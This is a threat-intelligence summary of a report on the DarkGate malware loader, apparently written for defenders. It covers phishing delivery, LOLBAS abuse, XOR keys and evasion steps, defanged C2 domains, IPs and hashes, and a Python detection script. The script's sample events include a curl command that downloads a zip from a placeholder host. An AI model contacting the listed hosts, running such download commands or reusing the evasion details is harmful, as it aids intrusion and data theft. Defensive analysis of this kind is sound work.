DarkGate: Opening Gates for Financially Motivated Threat Actors

DarkGate is a modular loader increasingly used by financially motivated actors (e.g., TA577, Ducktail, BianLian, Black Basta) to gain initial access, deploy follow-on tools (info-stealers, Cobalt Strike, ransomware), and exfiltrate data from primarily financial targets in Europe and the USA. The loader abuses phishing, Google DoubleClick open redirects, LOLBAS (curl.exe, cscript.exe, rundll32.exe), AutoIt scripts, DNS TXT and CAB/MSI delivery, and newer DLL side-loading and XOR-based decryption routines to evade detection and persist via Run Keys and a rootkit driver. #DarkGate #IcedID #BianLian #BlackBasta #TA577 #Ducktail #BankDeutschesKraftfahrzeuggewerbe

Keypoints

  • DarkGate distribution relies on phishing emails (PDF lures) that redirect via Google DoubleClick open redirects to attacker-controlled domains hosting ZIP/CAB/MSI payloads.
  • The primary execution chain uses LOLBAS (curl.exe, cscript.exe, rundll32.exe) to download a legitimate AutoIt binary and an encrypted .AU3 AutoIt script that decrypts and launches the DarkGate payload.
  • Version 5 added an internal crypter, polymorphic shellcode, manual process injection, anti-VM checks, and rootkit driver capability; version 6.1.6 introduced DLL side-loading using signed binaries (e.g., VLC, iTunesHelper).
  • Operators use multiple evasion techniques: XOR-based configuration and payload encryption, MZ header stripping, Windows Defender exclusions, Cloudflare abuse and reverse proxies for C2 forwarding.
  • DarkGate is used as an initial access loader by ransomware groups (BianLian, Black Basta) to deploy Cobalt Strike beacons and conduct post-exploitation lateral movement and data theft.
  • EclecticIQ provided detection guidance (SIGMA/KQL rules) targeting renamed AutoIt execution, suspicious use of curl.exe/wscript/cscript from temp folders, and DoubleClick redirections with “&adurl=” parameters.
  • The report includes detailed IOCs (C2 domains, downloader URLs, IPs, and multiple SHA-256 hashes) and a YARA rule to detect final DarkGate payloads.

MITRE Techniques

  • [T1566] Phishing – DarkGate relies on phishing for initial infection: “DarkGate campaigns primarily leverage phishing emails containing links or attachment to distribute the initial infection.”
  • [T1059] Command and Scripting Interpreter – Attackers run AutoIt scripts and VBS to decrypt and execute payloads: “the DarkGate loader runs the malicious .AU3 script, which contains the DarkGate payload.”
  • [T1105] Ingress Tool Transfer – Payloads are downloaded via redirected links and ZIP/CAB/MSI files: “redirect victims to the DarkGate downloading page hxxps[://]myhairven[.]com/hnun/?v=2932774 and drop the payloads in a ZIP compressed file.”
  • [T1218] Signed Binary Proxy Execution / LOLBAS – The campaign abuses living-off-the-land binaries (curl.exe, cscript.exe, rundll32.exe) to fetch and execute components: “The malware execution method commonly involves abusing Living Off the Land Binaries (LOLBAS), such as Curl.exe, to download the legitimate Autoit binary and the encrypted DarkGate payload…”
  • [T1574.002] DLL Side-Loading – Malicious DLLs are loaded by signed binaries (VLC, iTunesHelper): “DarkGate version 6.1.6 started to leverage DLL side loading technique for evasion.”
  • [T1055] Process Injection – DarkGate performs manual injection to execute in the context of other processes: “Manual process injection”.
  • [T1547.001] Registry Run Keys / Autostart Execution – Persistence is established via registry Run Keys and a driver rootkit: “establishes persistence through Windows registry Run Keys. In its version 5, it includes a rootkit module, allowing it to operate as a Windows driver.”
  • [T1027] Obfuscated Files or Information – Configuration and payloads use XOR and other obfuscation (polymorphic shellcode, internal crypter): “decrypts itself using the 8-byte XOR key ‘ZLhPAWah’ … it will be decrypted one more time by using one-byte XOR key ‘i’”.
  • [T1490/T1005] Data from Local System / Exfiltration – The loader collects system metadata and keylogger data for exfiltration: “DarkGate starts to send encrypted details about the victim computer and starts a keylogging activity.”

Indicators of Compromise

  • [C2 Domains] C2 infrastructure used by DarkGate – newdomainfortesteenestle[.]com, mainsercheronlinehostingbot[.]com
  • [Downloader URLs / Redirects] Redirects and download hosts used in delivery – adclick.g.doubleclick[.]net/pcs/click?…&&adurl=//projetodegente[.]com/, 5[.]181[.]159[.]64/Downloads/trefald.zip (MivoCloud SRL), and 5[.]252[.]178[.]193/Downloads/independert.zip/independert.msi
  • [IP Addresses] Hosting/IPs delivering MSI/CAB files – 5[.]181[.]159[.]64, 5[.]252[.]178[.]193 (examples noted for MSI/ZIP hosting)
  • [File Names] Dropped or observed file artifacts – script.au3 (encrypted AutoIt script), independert.msi, trefald.zip
  • [Hashes] SHA-256 samples of Decrypted DarkGate payloads – aee9287f835f93e6093649a826748e9b27f9921df5ce157d6fee982b8775e853, 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d, and 20+ other hashes listed in the report
  • [User-Agent] HTTP client string observed in C2/requests – “Mozilla/4.0 (compatible; Synapse)”

DarkGate delivery chains start with phishing PDF lures that use Google DoubleClick open redirects or direct links to attacker-controlled domains. Victims download ZIP/CAB/MSI payloads that contain a legitimate AutoIt binary and an encrypted AutoIt (.au3) script; the .au3 file decrypts an embedded payload and either launches directly or injects into a running process. Attackers commonly use LOLBAS (curl.exe, cscript.exe, rundll32.exe) to fetch components and run VBS/AutoIt scripts, and have shifted towards CAB/MSI distribution and DNS TXT or Cloudflare-backed reverse proxies to hide download locations.

On execution the loader employs multiple evasion and persistence techniques: an internal crypter and polymorphic shellcode to defeat AV, anti-VM checks and MZ-header stripping, XOR-based multi-stage decryption (e.g., 8-byte key ‘ZLhPAWah’ inside a masqueraded sqlite3.dll, then one-byte XOR ‘i’ in script.au3), Windows registry Run Keys, and an optional rootkit driver for stealth. Version 6.1.6 specifically implements DLL side-loading by wrapping malicious DLLs inside MSI installers and letting signed binaries (VLC, iTunesHelper, etc.) load them, which results in in-memory execution of the final DarkGate payload.

Post-compromise activity includes manual process injection, C2 communications that send system metadata and keylogger logs, and deployment of follow-on tools (info-stealers, Cobalt Strike beacons) by ransomware affiliates to enable lateral movement and data exfiltration. Detection priorities are monitoring for renamed AutoIt executions from temp directories, suspicious curl/wscript/cscript command lines, abnormal DoubleClick &adurl= redirections, and deploying YARA/SIGMA rules and DPI to catch CAB/MSI downloads and the specific XOR/decrypter signatures described in the report.
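As an added example (not code from the EclecticIQ report), the detection priorities above turned into triage logic over constructed Sysmon-style process events and proxy URLs. It assumes the AutoIt interpreter's PE version resource reports OriginalFileName AutoIt3.exe; the paths and download host in the sample events are placeholders.

```python
"""Triage constructed Sysmon-style process events and proxy URLs for the DarkGate
indicators above: renamed AutoIt, temp-folder LOLBAS use, DoubleClick adurl= redirects."""
import re
from urllib.parse import urlparse, parse_qs

# Assumption: the AutoIt interpreter's PE version resource reports
# OriginalFileName "AutoIt3.exe" (Sysmon event ID 1 exposes that field).
AUTOIT_ORIGINAL = "autoit3.exe"
LOLBAS = {"curl.exe", "cscript.exe", "wscript.exe", "rundll32.exe"}
TEMP_RE = re.compile(r"\\(?:windows\\temp|appdata\\local\\temp|temp)\\", re.I)

# Constructed sample events, not real telemetry; the download host is a placeholder.
EVENTS = [
    {"Image": r"C:\temp\test\test.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r"test.exe C:\temp\test\script.au3"},
    {"Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": r"curl.exe -o C:\Users\v\AppData\Local\Temp\trefald.zip http://example.invalid/x.zip"},
    {"Image": r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", "OriginalFileName": "AutoIt3.exe",
     "CommandLine": r'"C:\Program Files (x86)\AutoIt3\AutoIt3.exe" C:\Scripts\build.au3'},
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_process(ev: dict) -> list:
    """Return the names of the rules a single process-creation event trips."""
    hits = []
    image, cmd = basename(ev["Image"]), ev.get("CommandLine", "")
    orig = ev.get("OriginalFileName", "").lower()
    # PE metadata says AutoIt3.exe but the file on disk carries another name.
    if orig == AUTOIT_ORIGINAL and image != AUTOIT_ORIGINAL:
        hits.append("renamed_autoit")
    # Any AutoIt interpreter executing an .au3 script that lives in a temp folder.
    if orig == AUTOIT_ORIGINAL and ".au3" in cmd.lower() and TEMP_RE.search(cmd):
        hits.append("autoit_script_from_temp")
    # curl/cscript/wscript/rundll32 reading from or writing to a temp folder.
    if image in LOLBAS and TEMP_RE.search(cmd):
        hits.append("lolbas_temp_folder")
    return hits

def triage(events: list) -> dict:
    """Map event index -> tripped rules, omitting events with no hits."""
    return {i: h for i, e in enumerate(events) if (h := check_process(e))}

def is_doubleclick_redirect(url: str) -> bool:
    """True for adclick.g.doubleclick.net/pcs/click URLs that carry an adurl= target."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    return (host.endswith("doubleclick.net") and u.path.startswith("/pcs/click")
            and "adurl" in parse_qs(u.query))
```

The legitimately installed AutoIt3.exe in the third event trips nothing, which is the false-positive check a SIGMA rule for renamed AutoIt needs to pass.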

Read more: https://blog.eclecticiq.com/darkgate-opening-gates-for-financially-motivated-threat-actors